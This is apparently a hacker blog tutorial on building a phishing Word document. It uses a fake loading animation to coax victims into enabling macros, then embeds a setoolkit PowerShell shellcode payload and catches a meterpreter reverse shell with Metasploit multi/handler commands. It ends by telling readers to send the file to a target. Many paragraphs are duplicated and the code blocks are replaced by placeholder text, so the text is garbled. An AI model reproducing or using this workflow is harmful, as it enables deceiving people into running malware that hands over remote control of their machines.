Hi guys how is it going? Haven't posted for a while, sorry for that. I've prepared a lot of new tutorial topics so there are a lot of new tutorials (focussed on programming) upcoming!
In the last series we've crafted poisoned word documents. The only thing we had to do is send it to the target, wait till he/she opens it and ... PWNED! The only problem is that it's quite hard to get the target so far that he/she clicks the "enable macros" button . For that we should need some social engineering. Social engineering is really hard and not everyone is just as good as famous social engineers like Kevin Mitnick.
Here are some other examples of malicious documents.
In the last series we've crafted poisoned word documents. The only thing we had to do is send it to the target, wait till he/she opens it and ... PWNED! The only problem is that it's quite hard to get the target so far that he/she clicks the "enable macros" button . For that we should need some social engineering. Social engineering is really hard and not everyone is just as good as famous social engineers like Kevin Mitnick.
Here are some other examples of malicious documents.
The only problem this documents is is that if the target would click the enable button there won't really happen anything, the text won't get decrypted or un-blurred. This might raise the targets suspicious and they might run an av-scan against our document and that can be fatal for our whole attack. It would be much better is we could create an professional and convincingly looking series of actions which ensure that our target will click the enable-macros button and that our target won't get suspicious! In this tutorial we're going to write an vba script that starts an loading screen that will run since the targets presses the enable-macros button till our payload is loaded. Than the script will remove the big-red-font letters on the top that says "Please enable macros" or something like that. The last part the script does is that it removes the "please enable macros" watermark. In this series I'll show you 2 different styled versions of this script, one is rotating and the other one is flipping so we can do some pretty advanced stuff with this and now, let's start!
The first step is to open up word. On top of our document I've typed: " PLEASE ENABLE MACROS TO SEE FULL the CONTENT! " You can type here your own warning message but keep in mind that your code will be a little different.
The second step is to create two 'shapes'. The first shape is the loading image, the image you want to flip. You can copy-paste one of these images if you want.
The first step is to open up word. On top of our document I've typed: " PLEASE ENABLE MACROS TO SEE FULL the CONTENT! " You can type here your own warning message but keep in mind that your code will be a little different.
The second step is to create two 'shapes'. The first shape is the loading image, the image you want to flip. You can copy-paste one of these images if you want.
The second shape we're going to create is our "hider", this is an white shape placed over our "please wait" image. You can create it by insert -> shapes->
Select an square or rectangle and place it over the "Please Wait" image.
Then 'fill' the shape with and the borders white and our image is hidden.
The third step is to create a watermark. Go to page layout -> watermark -> custom watermark . Now you'll see a menu like this:
Select an square or rectangle and place it over the "Please Wait" image.
Then 'fill' the shape with and the borders white and our image is hidden.
The third step is to create a watermark. Go to page layout -> watermark -> custom watermark . Now you'll see a menu like this:
Use the "Text Watermark" radio-button and type at text your warning message. I've typed here "Please enable Macros to see full content!" as well. At Colour choose red and then press "okay".
Great now we've created our layout however it's still static. Let's put some 'magic' in it. We'll do this by creating our vba script. To create our script hit Alt+F8, this will open up a menu that gives you a few options. Type in that text box on top Workbook_Open and than hit the create box. Now you are in the Microsoft Visual Basic editor ow how they called it. This is the "IDE" we're going to use to design and execute our code
The first part of the code is the declaration of variables of the 2 shapes.
The variables are:
Great now we've created our layout however it's still static. Let's put some 'magic' in it. We'll do this by creating our vba script. To create our script hit Alt+F8, this will open up a menu that gives you a few options. Type in that text box on top Workbook_Open and than hit the create box. Now you are in the Microsoft Visual Basic editor ow how they called it. This is the "IDE" we're going to use to design and execute our code
The first part of the code is the declaration of variables of the 2 shapes.
The variables are:
one
If you placed the "Please wait" image first, set warner to 1 and hider to 2. If you did this the other way round call warner 2 and hider 2. The second thing the code does is removing the 'hider' shape (the white shape placed over the "Please wait" image)
Do this with:
Do this with:
Two
Then we're going to remove our "PLEASE ENABLE MACROS TO SEE FULL the CONTENT!" message (This could be different for you) we've typed on top of our document with something like "Loading please wait".
Do this with:
Do this with:
Hier klikken om te bewerken.
Great, the last thing we have to do before we gonna start our "please wait" flipping animation is to remove our watermark.
Do this with:
Do this with:
Three
Now we can start with creating our animation. This part of the code is really complicated but it relies on the stretching future of shapes and a simple do-loop. The script will do this a certain times in a row. The number of times you want the image to flip is defined in the variable "times" so change 15 in the numbers of times you want the image to flip.
Copy-paste this code:
Copy-paste this code:
Code Editor
Great, we've crafted a credible coowl-looking document. The last thing we have to do is adding the payload. We're going to generate the payload with the setoolkit.
Note that this payload is a powershell payload but you can add here any payload you want.
Go to your (kali)linux machine and just enter setoolkit to start the setoolkit. If you are in the setoolkit select these options
Then the setoolkit will ask you for a LHOST and a LPORT.Open up a new terminal-window and use the command: ifconfig wlan0 .Copy the inet adrr (remember that this adress is LAN only). Choose as LPORT whatever you want but I use 4444. Shutdown the setoolkit and display the shellcode. Do this with cat /root/.set/reports/powershell/x86_powershell_injection.txt. Tip: If you're using vmware player and want to move that file to your windows box type nautilus /root/.set/reports/powershell/ and drag'n drop the file to your windows machine.
If you got that file. Copy the code and go back to the vba IDE.
Now add this line and copy the payload between the brackets:
Note that this payload is a powershell payload but you can add here any payload you want.
Go to your (kali)linux machine and just enter setoolkit to start the setoolkit. If you are in the setoolkit select these options
- 1 for "social engineering attacks
- 9 for "powershell attack vectors
- 1 for "powershell alphanumeric shellcode injector
Then the setoolkit will ask you for a LHOST and a LPORT.Open up a new terminal-window and use the command: ifconfig wlan0 .Copy the inet adrr (remember that this adress is LAN only). Choose as LPORT whatever you want but I use 4444. Shutdown the setoolkit and display the shellcode. Do this with cat /root/.set/reports/powershell/x86_powershell_injection.txt. Tip: If you're using vmware player and want to move that file to your windows box type nautilus /root/.set/reports/powershell/ and drag'n drop the file to your windows machine.
If you got that file. Copy the code and go back to the vba IDE.
Now add this line and copy the payload between the brackets:
Hier klikken om te bewerken.
Amazing, now our script is complete. Go back to your (kali)Linux machine and start metasploit. Type msfconsole. Once it's loaded type:
Now send the document to your target, and see if he hit's that "enable-macros"button :)
That was it for today guys bye.
@ClaimItToYou
ps, here is the whole script,
- use multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST (your IP adress)
- set LPORT 4444
- exploit
Now send the document to your target, and see if he hit's that "enable-macros"button :)
That was it for today guys bye.
@ClaimItToYou
ps, here is the whole script,
vba code